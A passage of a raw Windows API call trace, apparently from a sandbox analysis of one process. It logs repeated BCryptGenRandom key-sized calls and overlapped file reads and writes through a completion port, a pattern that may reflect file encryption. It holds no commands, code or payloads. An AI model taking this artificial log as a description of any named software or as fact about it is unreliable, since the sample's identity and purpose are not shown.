lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.280] CloseHandle (hObject=0x330) returned 1 [0199.281] free (_Block=0x3df0008) [0199.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.293] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.293] free (_Block=0x3e305b8) [0199.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.293] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.293] free (_Block=0x1fa91d0) [0199.293] free (_Block=0x1fa2ed8) [0199.293] free (_Block=0x1fa90b8) [0199.293] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.295] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x62d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.296] CloseHandle (hObject=0x330) returned 1 [0199.296] free (_Block=0x3df0008) [0199.296] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.306] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.306] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.306] free (_Block=0x3e305b8) [0199.307] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.307] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.307] free (_Block=0x1fa91d0) [0199.307] free (_Block=0x1fa2ed8) [0199.307] free (_Block=0x1fa90b8) [0199.307] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.308] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.340] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4322, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.341] CloseHandle (hObject=0x330) returned 1 [0199.341] free (_Block=0x3df0008) [0199.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.360] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.360] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.360] free (_Block=0x3e305b8) [0199.360] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.360] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.360] free (_Block=0x1fa91d0) [0199.360] free (_Block=0x1fa2ed8) [0199.360] free (_Block=0x1fa90b8) [0199.360] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.370] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.370] free (_Block=0x3e305b8) [0199.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.370] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.371] free (_Block=0x1fa91d0) [0199.371] free (_Block=0x1fa2ed8) [0199.371] free (_Block=0x1fa90b8) [0199.371] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.388] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.402] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.415] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2fd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.439] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0199.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.454] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f40, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.469] CloseHandle (hObject=0x170) returned 1 [0199.469] free (_Block=0x1ff1e60) [0199.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.470] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5a30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.515] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5af0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.543] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.543] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.554] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x60f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.565] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x47c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.589] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xce9a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.750] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.760] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.763] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x758, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.767] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.804] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.816] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.818] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2068, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.820] CloseHandle (hObject=0x338) returned 1 [0199.820] free (_Block=0x3d70450) [0199.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.829] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.829] free (_Block=0x3e305b8) [0199.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.829] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.830] free (_Block=0x1fa91d0) [0199.830] free (_Block=0x1fa2ed8) [0199.830] free (_Block=0x1fa90b8) [0199.830] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.830] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.831] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.889] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdde, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.897] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.909] CloseHandle (hObject=0x338) returned 1 [0199.909] free (_Block=0x1ff1e60) [0199.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.909] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.934] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.942] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.947] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x61c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, 